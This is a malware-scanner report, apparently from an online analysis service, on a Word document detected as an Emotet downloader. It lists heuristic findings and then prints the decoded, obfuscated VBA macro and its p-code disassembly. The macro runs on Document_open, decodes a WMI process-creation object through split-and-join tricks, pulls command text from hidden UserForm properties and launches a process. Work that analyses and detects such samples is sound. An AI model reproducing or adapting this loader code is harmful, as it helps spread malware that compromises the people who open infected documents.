MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7578627-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7578627-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
u1 = Split(Kkfplkpdvk, "}{") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Fouvjqnljmee = CreateObject(Hrtzqswxcsfy) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35771 bytes |
SHA-256: 8e782a5c285b2ffce1b265cec85e76da6d575440f5163f0321d42eeaf09b9eec |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
51 of 141 identifiers look randomly generated (e.g. '_B_var_XexyrdwzaXwkntulzzygb'); 13 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Cfuiaiztoqz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Plhwacjwcanq.Yevzwodkmibrd
End Sub
Attribute VB_Name = "Bwqriffjx"
Attribute VB_Base = "0{A4AFFB55-D7EA-4584-A722-8E7D4792185C}{3FDB909B-C704-4B4F-AD73-9976E97204D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Kgukvnenpz"
Attribute VB_Base = "0{469CF7AD-9D26-495E-A7BF-4DCD6F807978}{DB09AC86-2C75-46A0-8368-D66F51243C75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kgdjogqkccwe()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Nbljjanajsysd"
Attribute VB_Base = "0{CD92AB08-7E3C-41EF-9AE3-AA3963C9E1FC}{DCCF0A3E-9438-4203-BA96-F2922FE93E9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kkfiojdgeiy()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Jikpkxzdb"
Attribute VB_Base = "0{1D5BE932-1369-489E-A072-4CA2FD8DC35D}{590FB518-8999-4B52-A843-B76616AD67F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Jgjxkkwdutr()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Wmokvgbkwir"
Attribute VB_Base = "0{953C44F6-B54F-4939-B973-768284C2E7EA}{927FC815-BAD8-4CD3-A122-46391A7FD87A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ihfvnifoy()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Gvumujkrqttyi"
Attribute VB_Base = "0{02FEFE92-BE4D-44CC-8948-6732BDCB7FDB}{D3A7806B-5146-4EEC-8CD1-438E6F5C4B01}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Uefnxrvcb()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Zgimbxepezlpq"
Attribute VB_Base = "0{510B1DB5-652C-48CE-AF04-F9FE1BFAB0F3}{816DD689-C0CC-46D3-813F-4D333F7E059B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Zkopjwfeobjlk()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Ttxwkdjerv"
Attribute VB_Base = "0{B9D90002-8C97-4875-A7EC-03EC9DF7BE0D}{34BD8F21-BBC2-4EDF-B4FD-D316D87E0301}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Liippbzslnle()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Buksmthugsrt"
Attribute VB_Base = "0{A4735D7E-DE70-4046-BA9F-D0F62B27C757}{8C539699-45FA-4005-BD0F-AD200E631070}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qgxtpduwfmuk()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Zfhsvqcotzj"
Attribute VB_Base = "0{06D1EFE3-2B11-4EAA-9620-CD3EE7B26A06}{37F6EC9F-4569-49CA-BEBA-D0BA4D6FA04D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Rcqxwzfbeq()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Xyfpyycirva"
Attribute VB_Base = "0{956B5434-1EA8-4940-8ABA-D9752F560114}{19675174-5B81-4731-8F57-B6DC8703A3B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Xkrcmykordtoo()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Fouppdyrwz"
Attribute VB_Base = "0{13544953-6023-49C6-9767-E3CC8E7B17D9}{3815A20E-081A-45A6-8C07-33AC843188B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Hsuvcgzz()
Debug.Print "nsg jjw uujsn bw" + q + "mnn iw dududud oow"
End Sub
Attribute VB_Name = "Plhwacjwcanq"
Function Yevzwodkmibrd()
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Iiceghagwbe = "}{}{w}{i}{}{n}{m}{g}{}{mt}{}{" + ChrW(Bwqriffjx.Zoom + 9 + 6) + ":}{wi}{}{n3}{}{}{2}{}{_}{}{" + Bwqriffjx.Mwkfvbdop + "r}{}{o}{ce}{s}{}{s}{"
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Hrtzqswxcsfy = Fgbyqiakdf(Iiceghagwbe)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Set Fouvjqnljmee = CreateObject(Hrtzqswxcsfy)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Msyoacrf = Bwqriffjx.Xfqbuvcmyh.Tag
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Obvbulmydmoud = Hrtzqswxcsfy + ChrW(Bwqriffjx.Zoom + 9 + 6) + Bwqriffjx.Rxpzskxtee.Tag + Msyoacrf
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Smgecjzgqq = Obvbulmydmoud + Bwqriffjx.Mwkfvbdop
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Set Hmpvkijz = Pqazhnhcsgxj(Smgecjzgqq)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Call Fouvjqnljmee. _
Create(Cfuiaiztoqz.NoLineBreakAfter + Stostkqdsrlw + qw2, Mwtzcrln, Hmpvkijz)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
Function Pqazhnhcsgxj(Ucriqjthagyc)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Set Pqazhnhcsgxj = CreateObject(Ucriqjthagyc)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Pqazhnhcsgxj. _
showwindow = Nuhtfmvmfinx + Mugffvfg
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
Function Fgbyqiakdf(Kkfplkpdvk)
u1 = Split(Kkfplkpdvk, "}{")
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Fgbyqiakdf = Join(u1, NoLineBreakAfter)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
Function Stostkqdsrlw()
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
e1 = Bwqriffjx.Yoqvrpkfguxrq.Pages(0).Caption
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
Stostkqdsrlw = Fgbyqiakdf(e1)
If 415175 <> 359956 Then
UopUvfqGGw = 415175 + 1989
LCpmlrVkIr = 359956 - 2013
Else
MsgBox (CStr(UopUvfqGGw) & CStr(LCpmlrVkIr))
End If
For CEwQ = 2 To 93
DoEvents
Next CEwQ
ELynmkLWOi = False
JeYUwziKZn = 886
If JeYUwziKZn > 25 Then
ELynmkLWOi = True
End If
YeocLljBWx = ELynmkLWOi
End Function
' Processing file: /opt/analyzer/scan_staging/eb8ef247eb554489b0936fe1672d7a71.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Cfuiaiztoqz - 1904 bytes
' Line #0:
' FuncDefn (Private Sub Cfuiaiztoqz())
' Line #1:
' LitDI4 0x55C7 0x0006
' LitDI4 0x7E14 0x0005
' Ne
' IfBlock
' Line #2:
' LitDI4 0x55C7 0x0006
' LitDI2 0x07C5
' Add
' St Document_open
' Line #3:
' LitDI4 0x7E14 0x0005
' LitDI2 0x07DD
' Sub
' St UopUvfqGGw
' Line #4:
' ElseBlock
' Line #5:
' Ld Document_open
' Coerce (Str)
' Ld UopUvfqGGw
' Coerce (Str)
' Concat
' Paren
' ArgsCall LCpmlrVkIr 0x0001
' Line #6:
' EndIfBlock
' Line #7:
' StartForVariable
' Ld MsgBox
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x005D
' For
' Line #8:
' ArgsCall DoEvents 0x0000
' Line #9:
' StartForVariable
' Ld MsgBox
' EndForVariable
' NextVar
' Line #10:
' LitVarSpecial (False)
' St CEwQ
' Line #11:
' LitDI2 0x0376
' St ELynmkLWOi
' Line #12:
' Ld ELynmkLWOi
' LitDI2 0x0019
' Gt
' IfBlock
' Line #13:
' LitVarSpecial (True)
' St CEwQ
' Line #14:
' EndIfBlock
' Line #15:
' Ld CEwQ
' St JeYUwziKZn
' Line #16:
' Ld YeocLljBWx
' ArgsMemCall Plhwacjwcanq 0x0000
' Line #17:
' EndSub
' Macros/VBA/Bwqriffjx - 1168 bytes
' Macros/VBA/Kgukvnenpz - 1432 bytes
' Line #0:
' FuncDefn (Sub Kgdjogqkccwe())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Nbljjanajsysd - 1435 bytes
' Line #0:
' FuncDefn (Sub Kkfiojdgeiy())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Jikpkxzdb - 1430 bytes
' Line #0:
' FuncDefn (Sub Jgjxkkwdutr())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Wmokvgbkwir - 1431 bytes
' Line #0:
' FuncDefn (Sub Ihfvnifoy())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Gvumujkrqttyi - 1432 bytes
' Line #0:
' FuncDefn (Sub Uefnxrvcb())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Zgimbxepezlpq - 1436 bytes
' Line #0:
' FuncDefn (Sub Zkopjwfeobjlk())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Ttxwkdjerv - 1433 bytes
' Line #0:
' FuncDefn (Sub Liippbzslnle())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Buksmthugsrt - 1433 bytes
' Line #0:
' FuncDefn (Sub Qgxtpduwfmuk())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Zfhsvqcotzj - 1432 bytes
' Line #0:
' FuncDefn (Sub Rcqxwzfbeq())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Xyfpyycirva - 1435 bytes
' Line #0:
' FuncDefn (Sub Xkrcmykordtoo())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Fouppdyrwz - 1429 bytes
' Line #0:
' FuncDefn (Sub Hsuvcgzz())
' Line #1:
' Debug
' PrintObj
' LitStr 0x0010 "nsg jjw uujsn bw"
' Ld q
' Add
' LitStr 0x0012 "mnn iw dududud oow"
' Add
' PrintItemNL
' Line #2:
' EndSub
' Macros/VBA/Plhwacjwcanq - 10170 bytes
' Line #0:
' FuncDefn (Function Plhwacjwcanq())
' Line #1:
' LitDI4 0x55C7 0x0006
' LitDI4 0x7E14 0x0005
' Ne
' IfBlock
' Line #2:
' LitDI4 0x55C7 0x0006
' LitDI2 0x07C5
' Add
' St Document_open
' Line #3:
' LitDI4 0x7E14 0x0005
' LitDI2 0x07DD
' Sub
' St UopUvfqGGw
' Line #4:
' ElseBlock
' Line #5:
' Ld Document_open
' Coerce (Str)
' Ld UopUvfqGGw
' Coerce (Str)
' Concat
' Paren
' ArgsCall LCpmlrVkIr 0x0001
' Line #6:
' EndIfBlock
' Line #7:
' StartForVariable
' Ld MsgBox
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x005D
' For
' Line #8:
' ArgsCall DoEvents 0x0000
' Line #9:
' StartForVariable
' Ld MsgBox
' EndForVariable
' NextVar
' Line #10:
' LitVarSpecial (False)
' St CEwQ
' Line #11:
' LitDI2 0x0376
' St ELynmkLWOi
' Line #12:
' Ld ELynmkLWOi
' LitDI2 0x0019
' Gt
' IfBlock
' Line #13:
' LitVarSpecial (True)
' St CEwQ
' Line #14:
' EndIfBlock
' Line #15:
' Ld CEwQ
' St JeYUwziKZn
' Line #16:
' LitStr 0x001D "}{}{w}{i}{}{n}{m}{g}{}{mt}{}{"
' Ld Bwqriffjx
' MemLd ChrW
' LitDI2 0x0009
' Add
' LitDI2 0x0006
' Add
' ArgsLd Iiceghagwbe 0x0001
' Add
' LitStr 0x001B ":}{wi}{}{n3}{}{}{2}{}{_}{}{"
' Add
' Ld Bwqriffjx
' MemLd Zoom
' Add
' LitStr 0x0014 "r}{}{o}{ce}{s}{}{s}{"
' Add
' St Yevzwodkmibrd
' Line #17:
' LitDI4 0x55C7 0x0006
' LitDI4 0x7E14 0x0005
' Ne
' IfBlock
' Line #18:
' LitDI4 0x55C7 0x0006
' LitDI2 0x07C5
' Add
' St Document_open
' Line #19:
' LitDI4 0x7E14 0x0005
' LitDI2 0x07DD
' Sub
' St UopUvfqGGw
' Line #20:
' ElseBlock
' Line #21:
' Ld Document_open
' Coerce (Str)
' Ld UopUvfqGGw
' Coerce (Str)
' Concat
' Paren
' ArgsCall LCpmlrVkIr 0x0001
' Line #22:
' EndIfBlock
' Line #23:
' StartForVariable
' Ld MsgBox
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x005D
' For
' Line #24:
' ArgsCall DoEvents 0x0000
' Line #25:
' StartForVariable
' Ld MsgBox
' EndForVariable
' NextVar
' Line #26:
' LitVarSpecial (False)
' St CEwQ
' Line #27:
' LitDI2 0x0376
' St ELynmkLWOi
' Line #28:
' Ld ELynmkLWOi
' LitDI2 0x0019
' Gt
' IfBlock
' Line #29:
' LitVarSpecial (True)
' St CEwQ
' Line #30:
' EndIfBlock
' Line #31:
' Ld CEwQ
' St JeYUwziKZn
' Line #32:
' Ld Yevzwodkmibrd
' ArgsLd Hrtzqswxcsfy 0x0001
' St Mwkfvbdop
' Line #33:
' LitDI4 0x55C7 0x0006
' LitDI4 0x7E14 0x0005
' Ne
' IfBlock
' Line #34:
' LitDI4 0x55C7 0x0006
' LitDI2 0x07C5
' Add
' St Document_open
' Line #35:
' LitDI4 0x7E14 0x0005
' LitDI2 0x07DD
' Sub
' St UopUvfqGGw
' Line #36:
' ElseBlock
' Line #37:
' Ld Document_open
' Coerce (Str)
' Ld UopUvfqGGw
' Coerce (Str)
' Concat
' Paren
' ArgsCall LCpmlrVkIr 0x0001
' Line #38:
' EndIfBlock
' Line #39:
' StartForVariable
' Ld MsgBox
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x005D
' For
' Line #40:
' ArgsCall DoEvents 0x0000
' Line #41:
' StartForVariable
' Ld MsgBox
' EndForVariable
' NextVar
' Line #42:
' LitVarSpecial (False)
' St CEwQ
' Line #43:
' LitDI2 0x0376
' St ELynmkLWOi
' Line #44:
' Ld ELynmkLWOi
' LitDI2 0x0019
' Gt
' IfBlock
' Line #45:
' LitVarSpecial (True)
' St CEwQ
' Line #46:
' EndIfBlock
' Line #47:
' Ld CEwQ
' St JeYUwziKZn
' Line #48:
' SetStmt
' Ld Mwkfvbdop
' ArgsLd Fouvjqnljmee 0x0001
' Set Fgbyqiakdf
' Line #49:
' LitDI4 0x55C7 0x0006
' LitDI4 0x7E14 0x0005
' Ne
' IfBlock
' Line #50:
' LitDI4 0x55C7 0x0006
' LitDI2 0x07C5
' Add
' St Document_open
' Line #51:
' LitDI4 0x7E14 0x0005
' LitDI2 0x07DD
' Sub
' St UopUvfqGGw
' Line #52:
' ElseBlock
' Line #53:
' Ld Document_open
' Coerce (Str)
' Ld UopUvfqGGw
' Coerce (Str)
' Concat
' Paren
' ArgsCall LCpmlrVkIr 0x0001
' Line #54:
' EndIfBlock
' Line #55:
' StartForVariable
' Ld MsgBox
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x005D
' For
' Line #56:
' ArgsCall DoEvents 0x0000
' Line #57:
' StartForVariable
' Ld MsgBox
' EndForVariable
' NextVar
' Line #58:
' LitVarSpecial (False)
' St CEwQ
' Line #59:
' LitDI2 0x0376
' St ELynmkLWOi
' Line #60:
' Ld ELynmkLWOi
' LitDI2 0x0019
' Gt
' IfBlock
' Line #61:
' LitVarSpecial (True)
' St CEwQ
' Line #62:
' EndIfBlock
' Line #63:
' Ld CEwQ
' St JeYUwziKZn
' Line #64:
' Ld Bwqriffjx
' MemLd Msyoacrf
' MemLd Tag
' St CreateObject
' Line #65:
' LitDI4 0x55C7 0x0006
' LitDI4 0x7E14 0x0005
' Ne
' IfBlock
' Line #66:
' LitDI4 0x55C7 0x0006
' LitDI2 0x07C5
' Add
' St Document_open
' Line #67:
' LitDI4 0x7E14 0x0005
' LitDI2 0x07DD
' Sub
' St UopUvfqGGw
' Line #68:
' ElseBlock
' Line #69:
' Ld Document_open
' Coerce (Str)
' Ld UopUvfqGGw
' Coerce (Str)
' Concat
' Paren
' ArgsCall LCpmlrVkIr 0x0001
' Line #70:
' EndIfBlock
' Line #71:
' StartForVariable
' Ld MsgBox
' EndForVariable
' LitDI2 0x0002
' LitDI2 0x005D
' For
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.